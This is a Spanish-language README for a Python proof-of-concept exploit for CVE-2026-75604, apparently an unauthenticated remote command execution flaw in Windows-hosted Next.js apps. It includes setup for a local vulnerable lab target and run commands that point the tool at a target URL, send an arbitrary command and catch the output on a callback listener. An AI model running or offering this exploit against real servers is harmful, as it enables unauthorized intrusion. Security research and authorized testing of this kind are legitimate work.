
Prueba de concepto de exploit para CVE-2026-75604, una ejecución remota de código no autenticada en aplicaciones Next.js alojadas en Windows, con ejecución de comandos basada en callbacks y configuración de objetivo local.
Prueba de concepto en Python para CVE-2026-75604, una vulnerabilidad de ejecución remota de comandos sin autenticación en aplicaciones Next.js alojadas en Windows que utilizan tanto Pages Router como App Router sin Cache Components.

>=13.4 <15.5.24 o >=16.0 <16.3.3Validado con [email protected].
python -m pip install -r requirements.txt
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE --app-cache-path /PATH/TO/APP_CACHE_INSTANCE
La ruta de la Server Action predeterminada es /. Use --action-field cuando su formulario tenga más de un campo.
Argumentos obligatorios:
--target URL: URL base de la aplicación Next.js--callback-ip ADDRESS: dirección IPv4 accesible por el objetivo--pages-cache-path PATH: página ISR dinámica existente de Pages Router--app-cache-path PATH: página dinámica existente de App Router respaldada por la caché del sistema de archivosArgumentos opcionales:
--command COMMAND: comando a ejecutar; el valor predeterminado es whoami--action-path PATH: página de App Router que contiene la Server Action compatible; el valor predeterminado es /--action-field NAME: campo de formulario consumido por la acción; se detecta automáticamente cuando no es ambiguo--callback-port PORT: puerto de callback; el valor predeterminado es 4331--listen-address ADDRESS: dirección local de enlace del callback; el valor predeterminado es 0.0.0.0--timeout SECONDS: tiempo de espera de solicitud y callback; el valor predeterminado es 20--insecure: desactiva la verificación de certificados TLSLa aplicación opcional target/ fija [email protected] y utiliza el servidor de producción estándar de Next.js:
cd target
npm ci
npm run build
npm start
Ejecute el PoC en otra terminal:
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed
El objetivo opcional proporciona las rutas requeridas y una Server Action compatible en /.
Este PoC se proporciona únicamente con fines educativos, investigación de seguridad y pruebas autorizadas. Úselo solo en sistemas que le pertenezcan o para los que tenga permiso explícito de prueba.
Crédito a evolutionstorm.
Este PoC fue reconstruido de forma independiente a partir del aviso público y del parche de Next.js.